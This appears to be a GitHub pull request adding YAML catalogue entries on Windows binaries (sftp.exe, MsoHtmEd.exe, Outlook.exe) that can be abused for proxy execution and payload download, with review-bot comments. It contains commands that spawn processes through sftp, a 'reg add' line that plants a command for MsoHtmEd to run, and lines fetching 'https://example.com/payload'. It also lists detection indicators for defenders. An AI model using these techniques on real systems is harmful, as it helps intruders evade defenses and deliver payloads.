Add msohtmed.exe as an executor #290

Open
wants to merge 10 commits into
base: master
35 changes: 35 additions & 0 deletions yml/OSBinaries/sftp.yml
@@ -0,0 +1,35 @@
---
Name: sftp.exe
Description: SSH File Transfer Protocol
Author: Nir Chako
Created: 2022-11-06
Commands:
- Command: "sftp -D c:\\windows\\system32\\notepad.exe"
Description: Execute notepad.exe with sftp.exe as parent process
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
- Command: "sftp -S c:\\windows\\system32\\notepad.exe localhost"
Description: Execute notepad.exe with sftp.exe as parent process
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
- Command: "sftp <ftp_user>@<ftp_Server_ip>:<path_of_file_to_download> <path_to_save_file>"
Description: Download file with sftp.exe from an FTP server
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures. If needed, you will be asked to submit a password for the sFTP session.
Category: Download
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\OpenSSH\sftp.exe
Detection:
- IOC: sftp.exe spawning unexpected processes
- IOC: Suspicious sFTP internet/network traffic
Acknowledgement:
- Person: 'Nir Chako (Pentera)'
Handle: '@C_h4ck_0'
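Review bot: the third command's Description ("Download file with sftp.exe from an FTP server") and the `<ftp_user>@<ftp_Server_ip>` placeholders name the wrong protocol: sftp.exe speaks SSH File Transfer Protocol (as this file's own Description says) and only talks to an SSH/SFTP server, so the placeholders should read something like `<ssh_user>@<sftp_server>` and the text "SFTP server". Two consistency points: this Download entry carries MitreID T1202 while the Outlook.yml Download entry in the same PR uses T1105 (Ingress Tool Transfer), which is the better fit for a file download; and "sFTP" in the Usecase and the Detection IOC should be "SFTP". The Acknowledgement Person is single-quoted here but unquoted in Outlook.yml; pick one style for the PR.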
7 changes: 7 additions & 0 deletions yml/OtherMSBinaries/MsoHtmEd.yml
@@ -4,6 +4,13 @@ Description: Microsoft Office component
Author: Nir Chako
Created: 2022-07-24
Commands:
- Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
Description: Execute a command line from the registry
Usecase: Set this registry key with the desired commaned you want to trigger (this example executes calc.exe) - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
- Command: MsoHtmEd.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
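Review bot: typo in the first command's Usecase: "commaned" should be "command". That Usecase also runs the full `reg add` invocation into one sentence; it reads better as "Set the following registry value to the command you want to trigger (this example runs calc.exe):" followed by the command. The example URL `https://any-valid-link-to-download-any-html-file-from.com` is inconsistent with the `https://example.com/payload` placeholder used by the second command and by Outlook.yml in this PR; use example.com. Since the Execute entry only works once `HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command` has been written, a Detection IOC for modification of that key is worth adding.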
34 changes: 34 additions & 0 deletions yml/OtherMSBinaries/Outlook.yml
@@ -0,0 +1,34 @@
---
Name: Outlook.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2022-11-08
Commands:
- Command: Outlook.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
Detection:
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'
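Review bot: the 64-bit Office12 path is listed twice (`C:\Program Files\Microsoft Office\Office12\Outlook.exe` appears on two consecutive lines); drop the duplicate. The Acknowledgement Person is unquoted here but single-quoted in sftp.yml in the same PR; make them consistent. Also, the PR title says it adds msohtmed.exe as an executor, but this file and sftp.yml introduce new binaries; either update the title and description to cover them or split them into their own PRs so each can be reviewed on its own.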